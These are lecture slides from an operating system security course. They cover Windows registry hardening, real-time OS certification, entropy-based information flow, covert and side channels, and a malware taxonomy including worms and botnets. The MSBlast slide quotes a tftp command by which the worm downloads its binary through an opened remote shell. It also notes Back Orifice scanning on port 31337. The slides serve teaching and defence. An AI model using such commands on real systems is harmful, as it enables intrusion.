1
INSE 6130 Operating System Security
Odds and Ends
1
Prof. Lingyu Wang
Outline
Registry SecurityEmbedded and Real-Time OS SecurityyInformation FlowThe Phantom Menace Review for Final Exam
2
RegistryWhat is registry
Configuration data stored in a hierarchical databaseR l f i i d fi i filReplacement of .ini, .sys, and .com configuration filesA tree with five root keys
HKEY_LOCAL_MACHINE: hardware/OS data of this computerHKEY_CLASSES_ROOT: OLE and file-class association dataHKEY_CURRENT_USER: profile for user logged on interactively HKEY_USERS: actively user profiles of non-remote usersHKEY CURRENT CONFIG: hardware profile
3
HKEY_CURRENT_CONFIG: hardware profileHives (trees rooted at top)
DEFAULT, SAM, SECURITY, SOFTWARE, and SYSTEM in C:\Windows\System32\Config and ntuser.dat in C:\Documents and Settings\administrator
http://msdn.microsoft.com/en-us/library/windows/desktop/ms724871(v=vs.85).aspx
Registry Best Practice
One incorrect edit to the registry can crash the operating system
If you are not completely sure about what you are doing, then better don't do it
Backup before you modify itUse the backup utility (accessories->system tools)Export/import registry hives
4
2
Access Control on Registry
What you can do in regedit“can” does not mean you shouldGrant full control/ownership of a registry key Assign (customized) permissions to a registry key to users or groupsAudit users/groups’ activity on a registry key
Restricting accesses
5
Local accesses: you can only make it inconvenientRemote accesses: shouldn’t be given in most cases
Domain controllers have accesses
Registry Hacks for Hardening OS
E.g., prevent NTLM password hashesXP and Windows 2000 use kerberos and NTLM hash is there for backwards compatibilityNTLM hashes can be easily broken by Rainbow crack
KEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa Win2K: Add NoLMHash = 1Xp: Value name: NoLMHash, Data type: REG_DWORD Radix: Decimal Value data: 1
E t (SYN) D S tt k i W2k
6
E.g., prevent (SYN) DoS attacks in W2kThe connection responses time out more quickly in the event of a SYN attack
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services key: SynAttackProtectValue: 0,1,2 (default to best protection)
Outline
Registry SecurityEmbedded and Real-Time OS SecurityyInformation FlowThe Phantom Menace Review for Final Exam
7
Where Are Embedded/Real-time OS?
B b di Ch ll
US Army's Crusader
RTOS processes ballistic calculations, the graphical
Bombardier Challenger 300
RTOS in the adaptive flight display systems
8
user interface and real-time equipment control systems
F-35
RTOS powers a portion of the Panoramic Cockpit Display subsystem
http://www.lynuxworks.com/rtos/rtos-178.php
3
Why Are Such Systems different?
A time constraint on an operation MUST be met regardless of the system load
Not the case on our PCsA good example: Anti-lock braking system (ABS)
System reliability, availability, etc.Availability= (mean time to
failure/recovery)MTTRMTTFMTTF+
9
The Standard for RTOSDO-178B: "Software Considerations in Airborne Systems and Equipment Certification"
A de facto standard for certifying aviation software such as RTOSA de facto standard for certifying aviation software, such as RTOSSoftware systems are categorized by the effects of their failures
A: Catastrophic - Failure may cause a crash B: Hazardous - Failure has a large negative impact on safety or performance, or reduces the ability of the crew to operate the plane .. C: Major - Failure is significant, but has a lesser impact that a Hazardous failure (e.g., leads to passenger discomfort)D: Minor Failure is noticeable but has a lesser impact than a Major
10
D: Minor - Failure is noticeable, but has a lesser impact than a Major failure (e.g., causing passenger inconvenience or a flight plan change) E: No Effect - Failure has no impact on safety, aircraft operation, or crew workload
The development process of a software is subject to different requirements based on its level
LynxOS-178 RTOS
An RTOS certifiable to DO-178B level AProvides security through fixed partitions of resources (time and memory)System events in one partition cannot interfere with events in another
E.g., CD player and ABS
11
Safety and Security
Common Criteria (CC)A standard (ISO/IEC 15408) for computer securityA framework for specifying security requirements and implementing/claiming and testing such requirements
DO-178B and CCSoftware developed to DO-178B Level A standards will map closely to either an EAL 4 or 5CC basically requires a small kernel capable of control
12
CC basically requires a small kernel capable of control information flow and maintain data isolation DO-178B kernel space partitioning provides bothFrom DO-178B to EAL 7, mostly formal method
http://www.csds.uidaho.edu/comparison/stc2002.pdf
4
Outline
Registry SecurityEmbedded and Real-Time OS SecurityyInformation FlowThe Phantom Menace Review for Final Exam
13
What We Already Know
Information flows whenI write to slides (push) You read slides (pull)You read what I have written
Information flow policy in BLP and BibaBLP: flow up (e.g., unclassfied to secret)Biba: flow down (e.g., high integrity to low integrity)
14
Chinese Wall: flow inside a CD (except sanitized)
Question:How to we model/measure “information flow”?
Answer: EntropyH(X) = - Σi p(X=xi) log2 p(X=xi)
Measures the uncertainty of XHow many bits required to represent X
ExampleX = 0 or 1, equally likely
H(X) = - ( p(X=0)log2 p(X=0) + p(X=1)log2 (X=1) )= - (1/2 log2 1/2 + 1/2 log2 1/2 ) = 1
Y 1 t i l Y 0 i ibl
15
Y = 1 certainly; Y=0 impossible H(Y) = - ( p(Y=1)log2 p(Y=1) )
= - 1 log2 1 = 0
The IntuitionQuestion: Do you need to know entropy in the final exam?
Before today, no clueAnswer: Yes 50% No 50% entropy 1
Right now, likelyAnswer: Yes 60% No 40% entropy 0.97
After the final exam…Answer: Yes - 100% or 0% entropy 0
16
Seeing slides, or the exam decreases your uncertainty (entropy) about the question
Information flows to you from slides (exam)More information flows to you from exam than from slides
5
Example 1Suppose
X can be either 0 or 1, equally likelySo, H(X) = 1
IfValue assignment Y := X (X: exam question; Y: my expression)
ThenH(X|Y) = 0 , knowing Y gives you X (Looking at my expression
17
gives you the exam question)
Value assignment causes information flow X → YWhat if c : value assignment Y := 1? (I am expressionless)
Example 2Suppose
0 ≤ X ≤ 7, equally likelySo, H(X) = –8(1/8) log2 (1/8) = 3Z = 1, 2 or 3, equally likely
IfY := X + Z
Then
18
Knowing Y, X can have at most 3 valuesH(X | Y) < –3(1/3) log (1/3) = log2 3 < 3Information flows X → Y
Example 3Suppose
X equally likely to be either 0 or 1y equally likely to be either true or falseH(X) = 1, H(Y) = 1
IfX > 0 ? Y:= true : Y:= false
Then
19
H(X|Y) = 0Information flows X → Y
Implicit information flowNo direct value assignment between X and Y
Confinement ProblemPrevent leaking confidential information
Easy: If processes only communicate via known i i h lcommunication channels
IsolationVirtual machines
OS runs on emulated ‘computer’, restrictied by VM
SandboxingA virtual machine for process instead of OS
20
A virtual machine for process, instead of OS
Linux
VMware
Windows
Applet
JVM
Windowshardware hardware
6
Covert ChannelIsolation only prevents direct communication via known channelsCovert channel is a communication channel not intended for communication
Storage channel, shared storage-basedTiming channel, time-based
21
Example 1 – Storage ChannelProcesses p, q not allowed to communicate
But they share a file system
They set up a storage channelAgree on two file names, /tmp001.txt and /tmp002.txt If p wants to send q a bit 1, it creates the file /tmp001.txt; otherwise it creates /tmp002.txtq records a bit based on the file name, and then deletes the file so p can send the next bit
22
the file, so p can send the next bit
p q
/tmp001.txt
1 p q
/tmp002.txt
0
Example 2 – Timing ChannelTiming attack on cryptosystem
Modular exponentiation algorithm (square and multiply)C t z d hComputes x = az mod n, where z = z0 … zk–1
x := 1; atmp := a;for i := 0 to k–1 do beginif zi = 1 then
x := (x * atmp) mod n;atmp := (atmp * atmp) mod n;
endresult := x;
23
Each 1 bit of z results in two multiplicationsRun time will be proportional to number of 1 bits
Example 3 – Timing ChannelTwo processes set up a timing channel
To send 0 bit: p relinquishes CPU as soon as it gets CPUTo send 1 bit: p uses CPU for the full timing slotq determines a bit by seeing how quickly it gets CPU
t CPU d li i h it p gets CPU p relinquishes CPU
24
p gets CPU, and relinquishes it
q gets CPU1
p gets CPU p relinquishes CPU
q gets CPU0
7
Noise/Mitigation of Covert ChannelWhen many processes share the same resource, the covert channel will be noisy
Noise will reduce the capacity of a covert channelBut does not remove it (remember any communication channel is noisy)
Mitigation of covert channel: obscure resource usageDevote uniform, fixed amount of resources to each process, even if some resources are wasted
25
even if some resources are wastedCrypto example, CPU example (e.g., RTOS)
Inject randomness into allocation/use of resources
Make Positive Use of Covert ChannelTracking anonymous P2P VOIP calls Alice
The connection between them is mixed with many others
Headers modifiedPayload encrypted
Suppose we suspect
Anonymizing network
26
Alice is talking to BobHow do we prove it?
Bob
Make Use of Covert Channel Cont’dTrack the call by transmitting a watermark through a timing channel based on inter-packet delays
BobAlice
BobAlice Add Watermark: 1011Detect Watermark
27
Bit 1 Bit 0
Question: why we always move packet to the right?
Web-based Application
Internet
Client Server
Advantages: Characteristics:
Encrypted Traffic
28
Less client-side resources
Easier to deliver and maintain
Low entropy inputs
Rich & diverse resource objects
Stateful communications
8
Side-Channel Attack
InternetSize and directions of packets between users and search engine
Client ServerEncrypted Traffic
User Input Observed Directional Packet Sizes
a: 801→, ←54, ←509, 60→
00: 812→, ←54, ←505, 60→,
Fixed pattern: identified input string
29
00: 812 , 54, 505, 60 ,
813→, ←54, ←507, 60→
b-byte s-byte
Indicator of input itself
Side-Channel Attack Cont’dS value for each character entered as:First keystroke: Second keystroke:
a b c d e f g
509 504 502 516 499 504 502
h i j k l m n
509 492 517 499 501 503 488
o p q r s t
509 525 494 498 488 494
First Keystroke
Second Keystroke
a b c d
a 509 487 493 501 497
b 504 516 488 482 481
c 502 501 488 473 477
30
u v w x y z
503 522 516 491 502 501 d 516 543 478 509 499
Unique s value 12 out of 1616 out of 16In reality, it may take more than
two keystrokes to uniquely identify an input string.
Leak out users’ private information: the input string
Outline
Registry SecurityEmbedded and Real-Time OS SecurityyInformation FlowThe Phantom Menace Review for Final Exam
31
The Phantom Menace
MaliciousPrograms
Needs HostProgram Independent
32
Trapdoors Logic Bombs Trojan Horses Viruses Worms Zombies Rootkits
9
BackdoorSecret entry point into a system
Special user identifier/password that circumvents normal security p oced esprocedures.
Commonly used by developersCould be included in a compiler (e.g., Ken Thompson)
Example: Back Orifice (BO) Win98 at DEFCON 6 in 1998, BO2k in 1999 BO server can be embedded in an executable file, when you run
33
, ythat file, BO silently installs itself as 122K “ .exe”Run a BO client, scan network for port 31337 (ELEET-elite), find any BO server - that machine is yours
Logic Bomb
Embedded in legitimate programsActivated when specified conditions metp
E.g., presence/absence of some file; Particular date/time or particular user
When triggered, typically damages systemModify/delete files/disks
Example: “CIA slipped bugs to Soviets”“In January 1982 President Ronald Reagan approved
34
“In January 1982, President Ronald Reagan approved a CIA plan to sabotage the economy of the Soviet Union through covert transfers of technology that contained hidden malfunctions, including software that later triggered a huge explosion in a Siberian natural gas pipeline”
Rootkit
A set of programs and codes that allows a permanent or consistent, undetectable presence on a computer
Hide malicious resources, e.g., processes, files, registry keys, open ports, etc.Provide hidden backdoor accesses
Simple rootkits:M dif (l ) d bl b l lik
35
Modify user programs (ls, ps), detectable by tools like Tripwire
Sophisticated rootkits:Modify the kernel itself, hard to detect from userland
Worm
Runs independently Does not require a host program
Propagates a fully working version of itself to other machinesCarries a payload performing hidden tasks
Backdoors, spam relays, DDoS agents; …
Phases
36
asesProbing Exploitation Replication Payload
10
Worm Propagation
A Worm A Victim
1:Target Probing
2: Vulnerability Exploitation
3: Replication
37
A Staged View of Worm Infection
MSBlast Worm (Aug., 2003)
8. Sends “START msblast.exe” command 9. Runs worm on target!
10. Closes connection 11. Shell closes
3. Connects to target on port 4444/TCP 4. Creates a shell “cmd.exe” and binds it to port 4444/TCP
5. Creates “TFTP Server” on port 69/UDP
6. Sends “TFTP” command to shell7. Runs TFTP command;“teleports” msblast.exe file
8. Sends START msblast.exe command 9. Runs worm on target!
>tftp –I 192.168.0.1 GET msblast.exe
38
192.168.0.1Blaster Target/RPC
192.168.10.11
1. Exploits target on port 135/TCP 2. Binds svchost.exe to port
4444/TCP via injected code
BotnetZombie
A computer that is secretly installed with Trojan h d b d f tt khorse and can be used for attacksBots join specific IRC channel on a Server and wait for further commandsAttacker remotely controls the bot
BotnetA network of zombies controlled by a ‘bot herder’
39
A network of zombies controlled by a bot herderConsisting of several ten thousands of botsUsually for malicious purposes
Botnets Cont’d
Botnet is usually for profitDistributed Denial-of-Service (DDoS) AttacksSpamming – install SOCKS v4/v5 proxy for spam emailsSniffing traffic/key logging – e.g., credit card numberSpreading new worms/virusesAds add-ons, spyware, phishing
Paid for clicking ads (Google adsense)
40
Paid for clicking ads (Google adsense)
Attacking IRC chat networks – Clone attackManipulating online polls/gamesMass Identity theft
11
How Does Botnet Work (1)
U d C t
Attacker scansInternet for
1Unsecured Computers
Attacker
Internet for unsecured systems that can be compromised
41
Internet
How Does Botnet Work (2)
U d C tAttacker secretlyinstalls zombie agent
2Z biUnsecured Computers
Attacker
installs zombie agent programs, turning unsecured computers into zombies
Zombies
42
Internet
How Does Botnet Work (3)
Zombie agentsZombie agents``phone home’’
3Z bi
Attacker
phone home and connect to a master server
Zombies
MasterServer
43
Internet
How Does Botnet Work (4)
Z bi
Attacker sends commands to Master Server to launch a
4
AttackerZombies
MasterServer
DDoS attack against a targeted system
44
Internet
12
How Does Botnet Work (5)
Z bi
Master Serversends signal to
5
AttackerZombies
MasterServer
sends signal to zombies to launch attack on targeted system
45
Internet
TargetedSystemSystem
Outline
Registry SecurityEmbedded and Real-Time OS SecurityyInformation FlowThe Phantom Menace Review for Final Exam
46